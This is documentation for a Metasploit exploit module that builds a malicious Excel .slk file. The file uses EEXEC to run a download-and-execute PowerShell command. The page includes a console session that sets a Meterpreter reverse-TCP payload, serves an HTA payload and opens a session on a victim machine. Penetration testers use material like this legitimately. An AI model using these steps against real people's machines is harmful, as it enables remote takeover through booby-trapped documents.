metasploit-gs/documentation/modules/exploit/windows/fileformat/office_excel_slk.md

## Introduction

The .slk file format used by Microsoft Excel has the ability to execute local commands via the `EEXEC(cmd)` function.
This module takes advantage of this 'feature' to run a download-and-execute powershell command in order to spawn a session
on the target.

## Vulnerable Application

  Microsoft Excel (tested on Excel 2016)

## Verification Steps

1. Start `msfconsole`
2. `use exploit/windows/fileformat/office_excel_slk`
3. `set LHOST [IP]`
4. `set SRVHOST [IP]`
5. `run`
6. Open generated file and press 'Enable Content' in Excel

## Options

  **FILENAME**

  The name of the generated .slk file. Default is a randomly generated file name.

## Scenarios

### Microsoft Excel 2016 on Windows 10 Build 17763.288

  ```
  msf > use exploit/windows/fileformat/office_excel_slk
  msf exploit(office_excel_slk) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf exploit(office_excel_slk) > set lhost 192.168.146.1
  lhost => 192.168.146.1
  msf exploit(office_excel_slk) > set srvhost 192.168.146.1
  srvhost => 192.168.146.1
  msf exploit(office_excel_slk) > run
  [*] Exploit running as background job.

  [*] Started reverse TCP handler on 192.168.146.1:4444
  [+] msf.doc stored at /Users/carter/.msf4/local/msf.slk
  [*] Using URL: http://192.168.146.1:8080/default.hta
  [*] Server started.
  ```

  Once the victim opens the file and clicks 'Enable Content' a session should spawn:

  ```
  [*] Sending stage (957487 bytes) to 192.168.146.145
  [*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2019-01-13 16:00:49 -0500
  ```